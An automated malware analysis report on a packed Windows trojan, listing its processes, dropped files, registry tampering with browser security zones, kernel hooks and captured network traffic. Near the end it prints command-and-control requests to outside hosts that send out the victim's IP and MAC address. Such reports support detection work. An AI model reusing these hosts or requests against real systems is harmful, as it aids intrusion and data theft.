Gen.Variant.Strictor.32558_1bcbbe2a26

by malwarelabrobot on April 11th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Strictor.32558 (B) (Emsisoft), Gen:Variant.Strictor.32558 (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: 1bcbbe2a260c59819a80f4463bc59bad
SHA1: 8d6a3f8fd01d77355fc1e76a2c99d275d19ba99f
SHA256: 78e67cd20fe385c9d54e79e366d53488c2a9093f9492c1de1aef4fabef50b511
SSDeep: 12288:8fz94 Ms3fuEaklOaMG1 ndfNmfRuF10fEIvCv:85EfZaklOa/ dEJujF9
Size: 483328 bytes
File type: PE32
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-27 15:15:14
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nvsvc32.exe:236
ndis500.exe:1340
%original file name%.exe:1360
MiniIE.exe:2432
ndsqp.exe:560
tray.exe:2212
iawbsms.exe:4008
wininit.exe:1640

The Trojan injects its code into the following process(es):

Explorer.EXE:880

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nvsvc32.exe:236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20141125[1].zip (141890 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20140618_L[1].zip (160210 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\3130B1871A126520A8C47861EFE3ED4D (240 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E04822AD18D472EA5B582E6E6F8C6B9A (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20150218[1].zip (26706 bytes)
%WinDir%\revt\atune.exe (6342 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E04822AD18D472EA5B582E6E6F8C6B9A (256 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\3130B1871A126520A8C47861EFE3ED4D (521 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20141125[1].zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20140618_L[1].zip (0 bytes)

The process ndis500.exe:1340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ndisweb_new.dat0 (8 bytes)
%System%\ndisweb_new.dat1 (185 bytes)
%System%\drivers\uniconfi.dat (4943 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%System%\ndisweb.log (559 bytes)

The Trojan deletes the following file(s):

%System%\ndisweb_new.dat0 (0 bytes)
%System%\ndisweb_new.dat1 (0 bytes)
%System%\drivers\ZWebNds.sys (0 bytes)
%System%\drivers\uniconfi.dat (0 bytes)

The process %original file name%.exe:1360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ .bat (109 bytes)
%WinDir%\system\pjkni\wininit.exe (74 bytes)
%WinDir%\system\oathr\nvsvc32.exe (127 bytes)

The process ndsqp.exe:560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ndisweb_new.dat0 (8 bytes)
%System%\ndisweb_new.dat1 (6 bytes)
%System%\drivers\uniconfi.dat (10 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%System%\ndisweb.log (142 bytes)

The Trojan deletes the following file(s):

%System%\ndisweb_new.dat0 (0 bytes)
%System%\ndisweb_new.dat1 (0 bytes)
%WinDir%\ax01.da0 (0 bytes)
%System%\drivers\ZWebNds.sys (0 bytes)

The process tray.exe:2212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\WaO\exec\services.exe (4331 bytes)

The process wininit.exe:1640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\WaO\MiniIE.txt (174412 bytes)
%System%\tl.dat (9 bytes)
%WinDir%\WaO\exec\tray.exe (7976 bytes)
%System%\bc.dat (1792 bytes)
%WinDir%\WaO\sys32\whitelist.txt (3 bytes)
%WinDir%\WaO\First.txt (18796 bytes)
%System%\tl.txt (676 bytes)
%System%\ndsqp.txt (12588 bytes)
%System%\safe.dat (3780 bytes)
%WinDir%\WaO\sys32\whitelist.dat (2 bytes)
%WinDir%\WaO\MiniIE.exe (7731 bytes)
%System%\ndis500.txt (44948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kxxrdti.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eqoztij.txt (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgcwmsq.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eaurlal.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vzszrtd.txt (10815 bytes)
%WinDir%\WaO\iawbsms.exe (110 bytes)
%WinDir%\WaO\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\miaofuk.txt (4545 bytes)
%System%\bc.txt (88388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bwsostq.txt (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tfijpnx.txt (601 bytes)
%System%\ndis500.exe (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\waoiuoq.txt (10177 bytes)
%WinDir%\WaO\sys32\urlnav.dll (83 bytes)
%System%\lhc.txt (9476 bytes)
%System%\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tzejock.txt (7345 bytes)
%System%\safe.txt (122772 bytes)
%System%\lhc.dat (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ulmxeae.txt (13 bytes)
%WinDir%\WaO\exec\tray.txt (188360 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%WinDir%\WaO\sys32\urlnav.txt (14076 bytes)

Registry activity

The process nvsvc32.exe:236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 BB D5 37 54 A0 67 61 1B CC 99 D6 C9 E8 67 0C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ndis500.exe:1340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 B6 F1 F0 2F 2D 4B D9 07 E8 CD F0 59 F7 1F 77"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 72 10 7F BC 3B 9B DE EE 8B FF 80 9F 9E C2 98"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\system\pjkni]
"wininit.exe" = "Spe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\system\oathr]
"nvsvc32.exe" = "nvsvc32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process MiniIE.exe:2432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 87 A0 FE 9B 0E AF C3 A4 F8 C2 7A 2A 91 B3 A9"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"

[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\WaO\MiniIE.exe"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"

The process ndsqp.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 24 4D DA 7B 5E D3 FA 98 3E 40 00 D8 FB 8E 78"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\ZWebNds\Enum]
[HKLM\System\CurrentControlSet\Services\ZWebNds\Security]
[HKLM\System\CurrentControlSet\Services\ZWebNds]

The process tray.exe:2212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 30 BD AE 6D 74 BD 51 BF A1 86 2F 40 38 F4 DD"

The process iawbsms.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\WaO\sys32\urlnav.dll"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"

[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"

[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"

[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 B2 2C 15 49 16 5D 3D B4 5A 0A 0E 5D 24 CB 47"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\WaO\sys32\urlnav.dll"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\WaO\sys32\"

The process wininit.exe:1640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 36 1F 91 75 A8 20 2A 78 41 AA 24 7C 5A 62 60"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

Dropped PE files

MD5 File path
a9ed74df4d21a2d07e7ab781ff2dbaa0 c:\WINDOWS\WaO\exec\services.exe
3e9be8a760b0a33a8cffadda6b14c737 c:\WINDOWS\WaO\exec\tray.exe
534fc31ae07bde7c9096304f8bce2ad7 c:\WINDOWS\WaO\iawbsms.exe
e8e96450084e9b4516186ec9b782b85b c:\WINDOWS\WaO\sys32\urlnav.dll
e187927254ca75e9b1d703eb8db242c7 c:\WINDOWS\revt\atune.exe
4540f263d05608dcd3eb0affc059bac5 c:\WINDOWS\system32\drivers\HideSys.sys
757b6e877f54b84fce04008b7bacc87a c:\WINDOWS\system\oathr\nvsvc32.exe
61dc7a5be8dcc3edacf6eebdb309a54f c:\WINDOWS\system\pjkni\wininit.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwDeviceIoControlFile

The Trojan installs the following kernel-mode hooks:

ZwOpenProcess
ZwQuerySystemInformation

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 430080 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 434176 450560 448512 5.45912 2f75ff68e3daf26adf5eda2185066321
.rsrc 884736 36864 33792 3.62856 f90bf23677ddc8194c4224822b3218d8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs



IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN PWS Win32/Lmir.BMQ checkin

Traffic

GET /txt/whitelist.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:37 GMT
Content-Type: text/plain
Content-Length: 3476
Last-Modified: Fri, 22 Nov 2013 08:41:51 GMT
Connection: close
ETag: "528f18cf-d94"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/First_20140926.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:17 GMT
Content-Type: text/plain
Content-Length: 147468
Last-Modified: Fri, 26 Sep 2014 08:07:24 GMT
Connection: close
ETag: "54251ebc-2400c"
Accept-Ranges: bytes

<<< skipped >>>

GET /txt/popup_150407.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=903D61BFD6141512B2E9B93503C22AF3 HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: kechuang.p2ptool.com
Connection: Close
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Apr 2015 10:23:17 GMT
Content-Type: text/plain
Content-Length: 1676640
Last-Modified: Tue, 07 Apr 2015 02:55:08 GMT
Connection: close
ETag: "5523470c-199560"
Accept-Ranges: bytes

<<< skipped >>>

POST /index.php?r=LPTemplar/Getinfo4GBL&cpt=55271a80013a491 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: MSDN Safa HTTP Retriever 1.0
Host: lpvoidray.lingpao8.com
Content-Length: 67
Cache-Control: no-cache

c=KgP3oOnpKr2gBuE8KcsdpiqBqwHk3fYy57U8zou9Q6SPPCu4FLiel1PHPoahRVD

HTTP/1.1 200 OK
Date: Fri, 10 Apr 2015 10:22:11 GMT
Server: Apache
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Content-Length: 79
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
55270253001a453K4p6M2rYS2xkJZuRetOUXrTBmK4-9EQVe7pjCoBdG6H29FuVQ7I14Du
lnfQ-IXa3..


